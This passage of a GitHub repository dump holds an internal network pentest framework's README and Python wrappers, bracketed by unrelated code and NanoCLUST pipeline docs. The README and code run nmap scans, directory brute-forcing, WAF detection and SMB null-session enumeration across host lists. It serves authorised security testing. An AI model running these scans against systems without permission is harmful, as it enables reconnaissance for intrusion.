ProgramingLanguageId=:language_id\",\n {\n 'user_id': target_solution['OwnerId'],\n 'task_id': target_solution['TestTaskId'],\n 'language_id': target_solution['ProgramingLanguageId']\n })) # TODO: also check by class_id/university_id later. 
target.createdat < i.createdAt\n\n solutions = get_last_solutions_since(target_solution['CreatedAt'], solutions)\n\n priority_solutions_ids = get_priority_solutions_ids(solutions)\n remove_solutions_by_id(solutions, priority_solutions_ids)\n\n # TODO: Check to other classes\n top_solutions_ids = get_top_solutions_ids_by_rating(solutions)\n remove_solutions_by_id(solutions, top_solutions_ids)\n\n # TODO: Check to other classes\n solutions.sort(reverse=True, key=lambda i: i['CreatedAt'])\n last_solutions = solutions[0:LAST_SOLUTIONS_AMOUNT]\n last_solutions_ids = [solution['Id'] for solution in solutions]\n\n # Compose all solutions ids\n solutions_ids = priority_solutions_ids\n solutions_ids.extend(top_solutions_ids)\n solutions_ids.extend(last_solutions_ids)\n\n return solutions_ids # TODO: add users_ids and solutions\n\n\nif __name__ != '__main__':\n sys.modules[__name__] = main\n"
}
] | 18 |
piyushimself/Internal-Network-Pentest-Framework
|
https://github.com/piyushimself/Internal-Network-Pentest-Framework
|
7242f3b332c903f30b5d171c545f897088dfd54f
|
4348ae177d207b1c6175316d49d135b31d073ce1
|
ec2262f5e2439ecff288421454c796fe078c211c
|
refs/heads/master
| 2023-03-21T20:33:12.502786 | 2020-06-10T09:50:53 | 2020-06-10T09:50:53 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5484627485275269,
"alphanum_fraction": 0.5831162333488464,
"avg_line_length": 32.929203033447266,
"blob_id": "7a4fb882a050dda17bbcf6d082d933849ffae6a4",
"content_id": "925d81c4e208848082e0e7b2ce009f6dea03a61d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3868,
"license_type": "no_license",
"max_line_length": 455,
"num_lines": 113,
"path": "/readme.md",
"repo_name": "piyushimself/Internal-Network-Pentest-Framework",
"src_encoding": "UTF-8",
"text": "# haise\n## Internal Network Pentest Framework\n\n\n\n## Internal Penetration Testing:\n\nAn Internal Penetration Test differs from a vulnerability assessment in that it actually exploits the vulnerabilities to determine what information is actually exposed. An Internal Penetration Test mimics the actions of an actual attacker exploiting weaknesses in network security without the usual dangers. This test examines internal IT systems for any weakness that could be used to disrupt the confidentiality, availability or integrity of the network\n\n## Methodology:\n\n • Internal Network Scanning\n traceroute www.google.com\n nmap 192.168.1.*\n \n • Port Scanning\n nmap -p- -T4 -iL sub.txt (Fast Scan)\n nmap -A 192.168.1.1 (Little Intense and slow)\n nmap -sV -sC -Pn -p 1-65535 -T5 --min-rate 1000 --max-retries 5 192.168.1.1\n nmap -sS -sC -sV -v -p 445 -iL subnet-files.txt\n nmap -sS -sC -sV -v -p 21 -iL subnet-files.txt\n\n Web Ports: 80, 8080, 443\n\n \n • Fingerprinting\n nmap -sV --version-intensity 5 192.168.1.1\n nc 192.168.1.1 80\n curl -sI http://192.168.1.1\n\n • Vulnerbility Scanning\n nmap --script vuln 192.168.1.1 -d\n nikto\n dirsearch\n nessus (https://localhost:8834)\n \n • IDS Penetration Testing\n lbd 45.34.23.12\n wafw00f http://192.168.1.1 \n \n • SMB Enumeration\n Discover Host:\n cme smb <subnet> (cme => crackmapexecs)\n\n Null Session:\n cme smb 192.168.24.0/24 -u '' -p ''\n smbmap –host-file smb-hosts.txt\n\n SMB Map:\n smbmap -H 192.168.1.1\n\n • Exploit Research\n https://www.exploit-db.com/\n https://www.rapid7.com/db/\n https://cxsecurity.com/search/ \n\n • Manual Vulnerability Testing and Verification\n • Password Strength Testing\n rate limiting\n sparta(tool)\n\n • Infrastructure Mapping (Maltego)\n\n DNS Server\n Firewall\n Cloud\n Employ Device\n Logging Server\n Directory Service\n Admin Workstation\n\n • Common Server Misconfiguration \n • Administrator Privileges Escalation\n • Database Security Controls Testing \n • Third-Party/Vendor Security Configuration Testing\n\n\n\n## Tool for Automation:\nInternal network could possibly contain large amount of IPs,So for automation first i generate some\none liner commands and then automate them.\n\n## Requirements:\n1. Currently only suppourt in Kali\n2. download dirsearch and place it /haise/---> here <---\n\n## Usage:\n1. git clone https://github.com/syedumerqadri/haise.git\n2. cd haise\n3. put all discoverd OR provided cilient IPs on hosts.txt\n4. python haise.py\n\nYou will got the prompt shell\n\n\n\n## Shell:\n\t\t[exit]\n\t\t[clear]\n\t\t[hosts]\tlist all hosts\n\t\t[alive]\tcheck if hosts are alive\n\t\t[ports]\tport scan of all hosts\n\t\t[dir]\tDirectory Enumuration\n\t [headers] Grab Web Headers\n\t\t[scan]\tGrab Headers, Port Scan and Directory Enumuration for all hosts \n\t\t[ids] Detect Intrusion Detection System\n\t\t[smb] Check for SMB Services\n\n\n## Results:\n\tDiscoverd Web Directories: dir_results\n\tDiscoverd Web headers: headers\n Port Scan Results: port_scan\n\n\n\n\n"
},
{
"alpha_fraction": 0.5443335175514221,
"alphanum_fraction": 0.5519671440124512,
"avg_line_length": 27.36206817626953,
"blob_id": "a3319792fef45ae709688d0540b8adb759206e05",
"content_id": "5de6db82d3bfb1d54a1c6783d481da930391799a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1703,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 58,
"path": "/nmapScanner.py",
"repo_name": "piyushimself/Internal-Network-Pentest-Framework",
"src_encoding": "UTF-8",
"text": "import urllib3\r\nimport multiprocessing.pool\r\nimport time\r\nimport os\r\n\r\nnumber_of_processes=30\r\nnmap_directory_name=\"port_scan\"\r\n\r\ndef runScan(target):\r\n print(\"Target scanning: \"+target)\r\n result = os.popen('nmap -Pn -T4 -sC -sS -sV -v -A -oA '+nmap_directory_name+'/nmap-' + target + \" \" + target).read().splitlines()\r\n\r\n\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\" ***** nmapScanner Started ***** \")\r\n if not os.path.exists(nmap_directory_name):\r\n os.makedirs(nmap_directory_name)\r\n\r\n input_file = open(\"hosts.txt\", \"r\")\r\n targets = input_file.readlines()\r\n input_file.close()\r\n targets = [x.strip() for x in targets]\r\n\r\n if len(targets) < number_of_processes:\r\n number_of_processes = len(targets)\r\n\r\n index = 0\r\n processes = []\r\n for i in range(number_of_processes):\r\n processes.append(multiprocessing.Process(target=runScan,args=(targets[index],)))\r\n index+=1\r\n\r\n for p in processes:\r\n p.start()\r\n\r\n more_loop = True\r\n while more_loop:\r\n time.sleep(5)\r\n\r\n for i in range(0,number_of_processes) :\r\n if processes[i].is_alive():\r\n processes[i].join(1)\r\n #print(\"jobs is not finished\")\r\n else:\r\n if index >= len(targets):\r\n for p in processes:\r\n p.join()\r\n more_loop = False\r\n break\r\n processes[i] = multiprocessing.Process(target=runScan,args=(targets[index],))\r\n processes[i].start()\r\n index+=1\r\n\r\n print(\"Port Scan Complete !!!\")\r\n exit(0)\r\n"
},
{
"alpha_fraction": 0.6039823293685913,
"alphanum_fraction": 0.616150438785553,
"avg_line_length": 23.880733489990234,
"blob_id": "e80a0db2c6fba08cb175a53bc0a352c4e1249fed",
"content_id": "5cb37dfa8784342183853e99cdf9b7bc1056ac97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2712,
"license_type": "no_license",
"max_line_length": 311,
"num_lines": 109,
"path": "/haise.py",
"repo_name": "piyushimself/Internal-Network-Pentest-Framework",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\n\nred = \"\\033[1;31;40m\"\nclear = \"\\033[1;0;00m\"\n\n\nprint red + '''\n _ _ \n| |_ __ _(_)___ ___ \n| ' \\/ _` | (_-</ -_)\n|_||_\\__,_|_/__/\\___|\n\n''' + clear + '''>> Internal Pentest Framework <<'''\n\ncommand = 1\nprint(\"\\n\")\n\ndir_exist = os.popen(\"ls | grep -c 'dir_results'\").read()\nR_DIR = int(dir_exist)\n\nif R_DIR == 1:\n\tprint(\"\")\n\nelif R_DIR == 0:\n\tos.system(\"mkdir dir_results\")\n\nelse:\n\tprint(\"Something went wrong\")\n\n\ndir_exist = os.popen(\"ls | grep -c headers\").read()\nR_DIR = int(dir_exist)\n\nif R_DIR == 1:\n\tprint(\"\")\n\nelif R_DIR == 0:\n\tos.system(\"mkdir headers\")\n\n\ndir_exist = os.popen(\"ls | grep -c port_scan\").read()\nR_DIR = int(dir_exist)\n\nif R_DIR == 1:\n\tprint(\"\")\n\nelif R_DIR == 0:\n\tos.system(\"mkdir port_scan\")\n\n\nwhile command != \"exit\":\n\tcommand = raw_input(\"COMMAND\"+red+\"|>\" + clear)\n\n\tif command == \"\":\n\t\tcommand = 1\n\n\telif command == \"hosts\":\n\t\tprint(\"\\n\")\n\t\tos.system('cat hosts.txt')\n\t\tprint(\"\\n\")\n\n\telif command == \"alive\":\n\t\tos.system('nmap -sn -iL hosts.txt')\n\n\telif command == \"clear\":\n\t\tos.system('clear')\n\n\telif command == \"ports\":\n\t\tos.system('python3 nmapScanner.py')\n\n\telif command == \"dir\":\n\t\tos.system(\"cat hosts.txt | xargs -I{} python3 dirsearch/dirsearch.py -u http://{} -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,jsp,rb,py,js,asp,aspx,zip,sql,tar,txt,key,doc,docx,html,jar,groovy,back,xml,ini,inc,config,json,yml,conf,cgi --plain-text-report=dir_results/http:{}.txt\")\n\n\telif command == \"headers\":\n\t\tos.system(\"cat hosts.txt | xargs -I{} sh -c 'curl -sI http://{} > headers/{}.txt'\")\n\n\telif command == \"ids\":\n\t\tos.system(\"cat hosts.txt | xargs -I{} sh -c 'lbd {} | grep does'\")\n\t\tos.system(\"cat hosts.txt | xargs -I{} sh -c 'wafw00f {} | grep site'\")\n\n\telif command == \"scan\":\n\t\tos.system('python3 nmapScanner.py')\n\t\tos.system(\"cat hosts.txt | xargs -I{} python3 dirsearch/dirsearch.py -u http://{} -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,jsp,rb,py,js,asp,aspx,zip,sql,tar,txt,key,doc,docx,html,jar,groovy,back,xml,ini,inc,config,json,yml,conf,cgi --plain-text-report=dir_results/http:{}.txt\")\n\t\tos.system(\"cat hosts.txt | xargs -I{} sh -c 'curl -sI http://{} > headers/{}.txt'\")\n\n\telif command == \"smb\":\n\t\tos.system(\"cat hosts.txt | xargs -I{} sh -c 'crackmapexec smb {}'\")\n\n\n\telif command == \"help\":\n\n\t\tprint '''\n\t\t[exit]\n\t\t[clear]\n\t\t[hosts]\tlist all hosts\n\t\t[alive]\tcheck if hosts are alive\n\t\t[ports]\tport scan of all hosts\n\t\t[dir]\tDirectory Enumuration\n\t [headers]\tGrab Web Headers\n\t\t[scan]\tGrab Headers, Port Scan and Directory Enumuration for all hosts \n\t\t[ids] Detect Intrusion Detection System\n\t\t[smb] Check for SMB Services\n\n\n\t\t'''\n\n\telse:\n\t\tprint \"[+] Unknown Command\"\n"
}
] | 3 |
SamBT/Test-Repo
|
https://github.com/SamBT/Test-Repo
|
9cec053c2cc8c925187e0d42382c3386f68f5d7d
|
05209a83516240021abaf0996fda5629eeb9fbc7
|
2a92fb3baa88711a28907bddba9ceafc2122691a
|
refs/heads/master
| 2021-01-23T13:43:18.301608 | 2015-03-15T02:58:21 | 2015-03-15T02:58:21 | 32,242,386 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7283950448036194,
"alphanum_fraction": 0.7283950448036194,
"avg_line_length": 39,
"blob_id": "b6fe6271abb60e1e68bef30c8209bd199a1e513e",
"content_id": "42833d30c01a0cce094a72ece0c9ae5b00a7d172",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 81,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 2,
"path": "/test.py",
"repo_name": "SamBT/Test-Repo",
"src_encoding": "UTF-8",
"text": "def new_function(r):\n print(\"Testing to see if this will pull back correctly\")\n\n"
}
] | 1 |
genomicsITER/NanoCLUST
|
https://github.com/genomicsITER/NanoCLUST
|
1abccf4c6b7e898dd5cf39aef4acf3314bbe04e6
|
9364ddcc96d7f90c34e97c4baa858835c9b0a943
|
4c7a44c7f53358b6439e43b9d1da435cb4643740
|
refs/heads/master
| 2023-06-21T16:13:18.241829 | 2022-11-29T16:12:58 | 2022-11-29T16:12:58 | 252,573,945 | 71 | 41 |
MIT
| 2020-04-02T22:00:26 | 2021-12-13T22:44:22 | 2021-12-20T10:03:45 |
Nextflow
|
[
{
"alpha_fraction": 0.7991940975189209,
"alphanum_fraction": 0.7991940975189209,
"avg_line_length": 48.63333511352539,
"blob_id": "283acdc498342a7a20c8c23317c8811e897918e8",
"content_id": "609741f968c1ce1db7d80f7bbf14de566559fcb2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2978,
"license_type": "permissive",
"max_line_length": 325,
"num_lines": 60,
"path": "/docs/3pipeline_output.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "# Pipeline output\n\nThis page describes the output produced by the pipeline.\n\n## QC reports\n\n### FastQC\n[FastQC](http://www.bioinformatics.babraham.ac.uk/projects/fastqc/) gives general quality metrics about your reads. It provides information about the quality score distribution across your reads and the per base sequence content (%T/A/G/C). You get information about adapter contamination and other overrepresented sequences.\n\nFor further reading and documentation see the [FastQC help](http://www.bioinformatics.babraham.ac.uk/projects/fastqc/Help/).\n\n> **NB:** The FastQC plots displayed in the MultiQC report shows _untrimmed_ reads. They may contain adapter sequence and potentially regions with low quality. To see how your reads look after trimming, look at the FastQC reports in the `trim_galore` directory.\n\n**Output directory: `results/fastqc`**\n\n* `sample_fastqc.html`\nFastQC report, containing quality metrics for your untrimmed raw fastq files\n\n* `zips/sample_fastqc.zip`\nzip file containing the FastQC report, tab-delimited data file and plot images\n\n\n### MultiQC\n[MultiQC](http://multiqc.info) is a visualisation tool that generates a single HTML report summarising all samples in your project. Most of the pipeline QC results are visualised in the report and further statistics are available in the report data directory.\n\n**Output directory: `results/multiqc`**\n\n* `Project_multiqc_report.html`\nMultiQC report - a standalone HTML file that can be viewed in your web browser\n* `Project_multiqc_data/`\nDirectory containing parsed statistics from the different tools used in the pipeline\n\n## NanoCLUST output\n\n### UMAP and HDBSCAN steps\nThe pipeline uses UMAP technique to project sequence read data. The cluster assignment is performed by HDBSCAN. \n\n* `results/sample_name/output.hdbscan.tsv`\nHDBSCAN raw output in TSV format. Contains the read IDs and assigned cluster\n\n### Polished sequences extraction and classification\nNanoCLUST builds a polished sequence from each cluster using Canu, Racon and Medaka. The sequence is then classified using blastn and a local database provided by the user. The polished sequence and the classification output table is included in the output:\n\n* `results/sample_name/clusterX/draft_read.fasta`\nDraft sequence extracted from the cluster\n\n* `results/sample_name/clusterX/consensus_medaka.fasta`\nDraft sequence extracted from the cluster\n\n* `results/sample_name/clusterX/consensus_classification.csv`\nBlast classification output \n\n### Additional plots\nNanoCLUST generates the UMAP projection plot and stacked barplots for single and pooled samples at different taxonomic levels. The plot module uses the taxid included in the classification table and [Unipept Taxonomy API](http://api.unipept.ugent.be)\n\n* `results/sample_name/hdbscan.output.png`\nUMAP projection and HDBSCAN clustering plot.\n\n* `results/rel_abundance_[FGS].png`\nRelative abundance barplot at different taxonomic levels for samples processed by the pipeline. "
},
{
"alpha_fraction": 0.7287843823432922,
"alphanum_fraction": 0.7397744655609131,
"avg_line_length": 44.70535659790039,
"blob_id": "881612ea1e9d658a8c3ed339bb3a1b4d8047f075",
"content_id": "71e23e20ace3bef23c18a1adfe8e2a6f7dbd5bc9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 10464,
"license_type": "permissive",
"max_line_length": 402,
"num_lines": 224,
"path": "/docs/2usage.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "# Usage\r\n\r\n## Introduction\r\nNextflow handles job submissions on SLURM or other environments, and supervises the run. Thus the Nextflow process must run until the pipeline is finished. We recommend that you put the process running in the background through `screen` / `tmux` or similar tool. Alternatively you can run Nextflow within a cluster job submitted your job scheduler.\r\n\r\nIt is recommended to limit the Nextflow Java virtual machines memory. We recommend adding the following line to your environment (typically in `~/.bashrc` or `~./bash_profile`):\r\n\r\n```bash\r\nNXF_OPTS='-Xms1g -Xmx4g'\r\n```\r\n\r\n<!-- TODO nf-core: Document required command line parameters to run the pipeline-->\r\n\r\n## Running the pipeline\r\nThe typical command for running the pipeline is as follows:\r\n\r\n```bash\r\nnextflow run main.nf --reads 'data/mock_sample.fastq' --db 'db/blastdb' --tax 'db/taxdb' -profile <conda,docker>\r\n```\r\nThis will launch the pipeline with the `conda` or `docker` configuration profiles. See below for more information about profiles.\r\n\r\n*Database and taxdb should be downloaded in the NanoCLUST dir.\r\n\r\n*--min_cluster_size and --polishing reads have default values to 50 and 100 respectively. We recommend to manually assign these when working with your own data to see how the pipeline output may change specially at low taxonomic levels such as species.\r\n\r\nNote that the pipeline will create the following files in your working directory:\r\n\r\n```bash\r\nwork # Directory containing the nextflow working files\r\nresults # Finished results (configurable, see below)\r\n.nextflow_log # Log file from Nextflow\r\n# Other nextflow hidden files, eg. history of pipeline runs and old logs.\r\n```\r\n\r\n### Updating the pipeline\r\nWhen you run the above command, Nextflow automatically pulls the pipeline code from GitHub and stores it as a cached version. When running the pipeline after this, it will always use the cached version if available - even if the pipeline has been updated since. To make sure that you're running the latest version of the pipeline, make sure that you regularly update the cached version of the pipeline:\r\n\r\n```bash\r\nnextflow pull nf-core/nanoclust\r\n```\r\n\r\n### Reproducibility\r\nIt's a good idea to specify a pipeline version when running the pipeline on your data. This ensures that a specific version of the pipeline code and software are used when you run your pipeline. If you keep using the same tag, you'll be running the same version of the pipeline, even if there have been changes to the code since.\r\n\r\nFirst, go to the [nf-core/nanoclust releases page](https://github.com/nf-core/nanoclust/releases) and find the latest version number - numeric only (eg. `1.3.1`). Then specify this when running the pipeline with `-r` (one hyphen) - eg. `-r 1.3.1`.\r\n\r\nThis version number will be logged in reports when you run the pipeline, so that you'll know what you used when you look back in the future.\r\n\r\n\r\n## Main arguments\r\n\r\n#### `-profile`\r\nUse this parameter to choose a configuration profile. Profiles can give configuration presets for different compute environments. 
Note that multiple profiles can be loaded, for example: `-profile docker` - the order of arguments is important!\r\n\r\nIf `-profile` is not specified at all, the pipeline will be run locally and expects all software to be installed and available on the `PATH`.\r\n\r\n* `conda`\r\nA generic configuration profile to be used with [conda](https://conda.io/docs/)\r\nPulls most software from [Bioconda](https://bioconda.github.io/)\r\n\r\n* `docker`\r\nA generic configuration profile to be used with [Docker](http://docker.com/)\r\nPulls software from dockerhub: [`nfcore/nanoclust`](http://hub.docker.com/r/nfcore/nanoclust/)\r\n\r\n* `singularity`\r\nA generic configuration profile to be used with [Singularity](http://singularity.lbl.gov/)\r\nPulls software from DockerHub: [`nfcore/nanoclust`](http://hub.docker.com/r/nfcore/nanoclust/)\r\n\r\n* `test`\r\nA profile with a complete configuration for automated testing\r\nIncludes links to test data so needs no other parameters\r\n\r\n<!-- TODO nf-core: Document required command line parameters -->\r\n\r\n#### `--reads`\r\nUse this to specify the location of your input FastQ files. For example:\r\n\r\n```bash\r\n--reads 'sample.fastq'\r\n```\r\n\r\nPlease note the following requirements:\r\n\r\n1. The path must be enclosed in quotes\r\n2. The path must have at least one `*` wildcard character\r\n\r\n#### `--demultiplex`\r\nIf you have pooled data, you need to specify `--demultiplex` on the command line to enable initial demultiplex process of samples.\r\n\r\n#### `--demultiplex_porechop`\r\nSame as above but uses porechop software for demultiplexing.\r\n\r\n```bash\r\n--reads 'pooled_sample.fastq' --demultiplex[_porechop]\r\n```\r\n\r\n#### `--kit` (RAB204)\r\n(Only with --demultiplex). Barcoding kit\r\n\r\nKits supported:\r\n{Auto,PBC096,RBK004,NBD104/NBD114,PBK004/LWB001,RBK001,RAB204,VMK001,PBC001,NBD114,NBD103/NBD104,DUAL,RPB004/RLB001}\r\n\r\n## UMAP and HDBSCAN configuration parameters\r\n\r\n#### `--umap_set_size` (default 100000)\r\nNumber of reads that are used for the UMAP projection.\r\n\r\n#### `--cluster_sel_epsilon` (0.5)\r\nMinimum distance to separate a cluster from another. This parameter will depend on your input data and may have practical effect on the number of clusters generated. More information is available in [HDBSCAN parameter section](https://hdbscan.readthedocs.io/en/latest/parameter_selection.html).\r\n\r\n#### `--min_cluster_size` (100)\r\nMinimum number of reads necessary to call a cluster. Note that sensitivity decreases when this parameter is increased.\r\n\r\n## Polishing parameters\r\n\r\n#### `--polishing_reads` (100)\r\nNumbers of reads used in the canu, racon and medaka polishing steps.\r\n\r\n## Taxonomic and taxdb databases \r\n\r\nThe pipeline uses blastn software for the classification of the polished sequence of each cluster. The following parameters allows database configuration:\r\n\r\n#### `--db`\r\nPath to the local blast database. Database files can be downloaded using FTP directly from [NCBI](ftp://ftp.ncbi.nlm.nih.gov/blast/db/)\r\n\r\nFor 16S rRNA database, download 16S_ribosomal_RNA.tar.gz, decompress the file under a db directory and specify the full path:\r\n * `--db \"/path/to/nanoclust/db/16S_ribosomal_RNA\"`\r\n\r\n#### `--tax`\r\n--db option will only output the tax ID for the target. For complete classification output, specify the taxdb path along with the local database. 
Taxdb database is also available from [NCBI databases](ftp://ftp.ncbi.nlm.nih.gov/blast/db/) (taxdb.tar.gz)\r\n\r\n\r\n## Job resources\r\n### Automatic resubmission\r\nEach step in the pipeline has a default set of requirements for number of CPUs, memory and time. For most of the steps in the pipeline, if the job exits with an error code of `143` (exceeded requested resources) it will automatically resubmit with higher requests (2 x original, then 3 x original). If it still fails after three times then the pipeline is stopped.\r\n\r\n## Other command line parameters\r\n\r\n<!-- TODO nf-core: Describe any other command line flags here -->\r\n\r\n#### `--min_read_length`\r\nMinimum length of reads (bp) used in analysis.\r\n\r\n#### `--max_read_length`\r\nMaximum length of reads (bp) used in analysis.\r\n\r\n#### `--outdir`\r\nThe output directory where the results will be saved.\r\n\r\n#### `--email`\r\nSet this parameter to your e-mail address to get a summary e-mail with details of the run sent to you when the workflow exits. If set in your user config file (`~/.nextflow/config`) then you don't need to specify this on the command line for every run.\r\n\r\n#### `--email_on_fail`\r\nThis works exactly as with `--email`, except emails are only sent if the workflow is not successful.\r\n\r\n#### `-name`\r\nName for the pipeline run. If not specified, Nextflow will automatically generate a random mnemonic.\r\n\r\nThis is used in the MultiQC report (if not default) and in the summary HTML / e-mail (always).\r\n\r\n**NB:** Single hyphen (core Nextflow option)\r\n\r\n#### `-resume`\r\nSpecify this when restarting a pipeline. Nextflow will used cached results from any pipeline steps where the inputs are the same, continuing the pipeline steps from there.\r\n\r\nYou can also supply a run name to resume a specific run: `-resume [run-name]`. Use the `nextflow log` command to show previous run names.\r\n\r\n**NB:** Single hyphen (core Nextflow option)\r\n\r\n#### `-c`\r\nSpecify the path to a specific config file (this is a core Nextflow command).\r\n\r\n**NB:** Single hyphen (core Nextflow option)\r\n\r\nNote - you can use this to override pipeline defaults.\r\n\r\n#### `--custom_config_version`\r\nProvide git commit id for custom Institutional configs hosted at `nf-core/configs`. This was implemented for reproducibility purposes. Default is set to `master`.\r\n\r\n```bash\r\n## Download and use config file with following git commid id\r\n--custom_config_version d52db660777c4bf36546ddb188ec530c3ada1b96\r\n```\r\n\r\n#### `--custom_config_base`\r\nIf you're running offline, nextflow will not be able to fetch the institutional config files\r\nfrom the internet. If you don't need them, then this is not a problem. If you do need them,\r\nyou should download the files from the repo and tell nextflow where to find them with the\r\n`custom_config_base` option. 
For example:\r\n\r\n```bash\r\n## Download and unzip the config files\r\ncd /path/to/my/configs\r\nwget https://github.com/nf-core/configs/archive/master.zip\r\nunzip master.zip\r\n\r\n## Run the pipeline\r\ncd /path/to/my/data\r\nnextflow run /path/to/pipeline/ --custom_config_base /path/to/my/configs/configs-master/\r\n```\r\n\r\n> Note that the nf-core/tools helper package has a `download` command to download all required pipeline\r\n> files + singularity containers + institutional configs in one go for you, to make this process easier.\r\n\r\n#### `--max_memory`\r\nUse to set a top-limit for the default memory requirement for each process.\r\nShould be a string in the format integer-unit. eg. `--max_memory '8.GB'`\r\n\r\n#### `--max_time`\r\nUse to set a top-limit for the default time requirement for each process.\r\nShould be a string in the format integer-unit. eg. `--max_time '2.h'`\r\n\r\n#### `--max_cpus`\r\nUse to set a top-limit for the default CPU requirement for each process.\r\nShould be a string in the format integer-unit. eg. `--max_cpus 1`\r\n\r\n#### `--plaintext_email`\r\nSet to receive plain-text e-mails instead of HTML formatted.\r\n\r\n#### `--monochrome_logs`\r\nSet to disable colourful command line output and live life in monochrome.\r\n\r\n#### `--multiqc_config`\r\nSpecify a path to a custom MultiQC configuration file.\r\n\r\n"
},
{
"alpha_fraction": 0.7495150566101074,
"alphanum_fraction": 0.7764306664466858,
"avg_line_length": 59.64706039428711,
"blob_id": "5847f032184c6b3a5835425426dd758de1c5bb59",
"content_id": "949e96427244c22aa43a2915940be34bdfd87925",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4133,
"license_type": "permissive",
"max_line_length": 651,
"num_lines": 68,
"path": "/README.md",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
"text": "# NanoCLUST\n\n**De novo clustering and consensus building for ONT 16S sequencing data**.\n\n## Introduction\n\nThe pipeline is built using [Nextflow](https://www.nextflow.io), a workflow tool to run tasks across multiple compute infrastructures in a very portable manner. It comes with docker containers making installation trivial and results highly reproducible.\n\n## Quick Start\n\ni. Install [`nextflow`](https://nf-co.re/usage/installation)\n\nii. Install [`docker`](https://docs.docker.com/engine/installation/) or [`conda`](https://conda.io/miniconda.html)\n\niii. Clone the NanoCLUST repository and test the pipeline on a minimal dataset with a single command and docker/conda profiles.\n\n*Download a BLAST database in the NanoCLUST dir for cluster sequence classification. For NCBI 16S rRNA database:\n\n```bash\nmkdir db db/taxdb\nwget https://ftp.ncbi.nlm.nih.gov/blast/db/16S_ribosomal_RNA.tar.gz && tar -xzvf 16S_ribosomal_RNA.tar.gz -C db\nwget https://ftp.ncbi.nlm.nih.gov/blast/db/taxdb.tar.gz && tar -xzvf taxdb.tar.gz -C db/taxdb\n```\n\n```bash\n#Using docker profile with container-based dependencies (recommended).\nnextflow run main.nf -profile test,docker\n```\n\niv. Start running your own analysis!\n\nRun a single sample analysis inside NanoCLUST dir using default parameters:\n\n```bash\nnextflow run main.nf \\ \n -profile docker \\ \n --reads 'sample.fastq' \\ \n --db \"db/16S_ribosomal_RNA\" \\ \n --tax \"db/taxdb/\"\n```\n\nSee usage and output sections in the documentation (/docs) for all of the available options when running the pipeline.\n\n## Computing requirements note\n\nClustering step uses up to 32-36GB RAM when working with a real dataset analysis and default parameters (umap_set_size = 100000). Setting umap_set_size to 50000, will diminish memory consumption to 10-13GB RAM. When running the pipeline, kmer_freqs or mostly read_clustering processes could be terminated with status 137 when not enough RAM.\n\nNextflow automatically uses all available resources in your machine. More cpu threads enable the pipeline to compute and classify the different clusters at the same time and hence reduces the overall execution time.\n\nUsing the -with-trace option, it is possible to get an execution trace file which includes computing times and memory consumption metrics for all pipeline processes.\n\n*The execution of the test profile (minimum testing dataset and default parameters) can be done with a regular 4 cores and 16GB RAM machine.\n\n## Troubleshooting\n\n- Using conda profile, some issues can arise due to unknown problems with the read_clustering and kmer_freq conda environments. If it is the case, we recommend using the docker profile to ensure all dependencies run in the right environments and these are tested and available in the cloud (automatically downloaded when using docker profile).\n\n- In some machines, the read_clustering process exits with error status(_RuntimeError: cannot cache function '...'_). We have seen that this condition can be avoided running the pipeline with sudo privileges (even if Docker was previously available without sudo permissions). \n\n## Credits\n\nRodríguez-Pérez H, Ciuffreda L, Flores C. NanoCLUST: a species-level analysis of 16S rRNA nanopore sequencing data. Bioinformatics. 2021;37(11):1600-1601. 
doi:https://doi.org/10.1093/bioinformatics/btaa900\n\nThis work was supported by Instituto de Salud Carlos III [PI14/00844, PI17/00610, and FI18/00230] and co-financed by the European Regional Development Funds, “A way of making Europe” from the European Union; Ministerio de Ciencia e Innovación [RTC-2017-6471-1, AEI/FEDER, UE]; Cabildo Insular de Tenerife [CGIEU0000219140]; Fundación Canaria Instituto de Investigación Sanitaria de Canarias [PIFUN48/18]; and by the agreement with Instituto Tecnológico y de Energías Renovables (ITER) to strengthen scientific and technological education, training, research, development and innovation in Genomics, Personalized Medicine and Biotechnology [OA17/008]. \n\n## Contributions and Support\n\nIf you would like to contribute to this pipeline, please see the [contributing guidelines](.github/CONTRIBUTING.md).\n"
},
{
"alpha_fraction": 0.5976190567016602,
"alphanum_fraction": 0.6136904954910278,
"avg_line_length": 31.30769157409668,
"blob_id": "0de535d750f34d73c673fc0a698a4cfc6a068470",
"content_id": "0097ffe925603508ceb2cabc7b754e86d0c46bb4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1680,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 52,
"path": "/bin/scrape_software_versions.py",
"repo_name": "genomicsITER/NanoCLUST",
"src_encoding": "UTF-8",
